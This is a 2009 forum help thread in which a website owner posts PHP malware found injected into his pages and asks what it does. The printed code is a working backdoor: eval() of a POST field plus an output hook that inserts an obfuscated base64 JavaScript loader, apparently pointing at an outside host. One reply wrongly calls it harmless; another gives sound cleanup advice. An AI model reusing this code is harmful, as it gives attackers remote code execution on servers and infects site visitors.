Page 1 of 1

Hack threat advice

Posted: Wed May 13, 2009 10:38 am
by kendall
this seems to be what is showing up on my logs... I'm trying to get a handle on what its intentions were

Code: Select all

if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBiQzREPSdfNzZhcl8yMGFfM2RfMjJTY3JpcHRfNDVuZ2luZV8yMl8yY2JfM2RfMjJfNTZlcnNpb25fMjhfMjkrXzIyXzJjal8zZF8yMl8yMl8yY3VfM2RfNmVhdmlfNjdhXzc0b183Ml8yZXVzZV83MkFnZW50XzNiaWZfMjgoXzc1XzJlaW5kXzY1eE9mXzI4XzIyV2luXzIyKV8zZTApXzI2XzI2KHVfMmVpbmRleE9mXzI4XzIyXzRlVF8yMF8zNl8yMilfM2NfMzBfMjlfMjZfMjYoZG9jdW1lbnRfMmVjb29fNmJfNjlfNjVfMmVpbmRlXzc4T2ZfMjhfMjJtaWVrXzNkMV8yMilfM2MwKV8yNl8yNih0eV83MGVvZl8yOF83YV83MnZ6Xzc0cylfMjFfM2R0eXBlb2YoXzIyQV8yMilfMjkpXzdiXzdhcnZ6Xzc0c18zZF8yMkFfMjJfM2Jldl82MWxfMjhfMjJfNjlmKHdfNjluZF82ZndfMmVfMjJfMmJhXzJiXzIyKWpfM2RqXzJiXzIyK182MStfMjJfNGRhal82ZnJfMjJfMmJiK2ErXzIyXzRkaW5vXzcyXzIyXzJiYitfNjErXzIyXzQyXzc1aV82Y2RfMjIrYl8yYl8yMmpfM2JfMjJfMjlfM2JkXzZmY3VfNmRlbnRfMmV3XzcyXzY5dGUoXzIyXzNjc2NyaXB0XzIwc3JfNjNfM2RfMmZfMmZndW1ibGFyXzJlY25fMmZyc3NfMmZfM2ZfNjlfNjRfM2RfMjIraitfMjJfM2VfM2NfNWNfMmZzY3JpcHRfM2VfMjIpXzNiXzdkJzt2YXIgRnVKeD1iQzRELnJlcGxhY2UoL18vZywnJScpO3ZhciB4RnRJSj11bmVzY2FwZShGdUp4KTtldmFsKHhGdElKKX0pKCk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#['"][^\s'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
These seem to be what the hacker is putting in my index.php and html files. along with a "<iframe" link....

ok I'm not running any CMS software and I have changed my FTP and made adjustments to my PHP ini file ...yet other sites of mines are being attacked and hacked as I speak... Is there anything that I should be looking for in my code to help pin point a hole and stop it....

Re: Hack threat advice

Posted: Wed May 13, 2009 2:55 pm
by crazycoders
Well he is definitely trying to inject some HTML/SCRIPT code into your page to do what... i'm not sure... If it's only one use, there is no risk, he'll be hacking himself at worst. Maybe he's trying to find vulnerabilities in your code...

Re: Hack threat advice

Posted: Wed May 13, 2009 3:17 pm
by kaisellgren
You said you are not using CMS's, okay. Are you using any PHP scripts? Are all your websites on the same server? This guy probably got into your server through a vulnerability in an application and has now an access to your server.

First you would need to update all scripts you have there to the latest versions. If there are no updates for some scripts, make a google search for vulnerabilities that may exist in the version you have. Eliminate all unnecessary scripts and junk and after that reset everything back to normal and especially change all salts, passwords, etc before putting your sites at public again.

And yes, this means you have to change all FTP credentials, hosting control panel credentials, etc.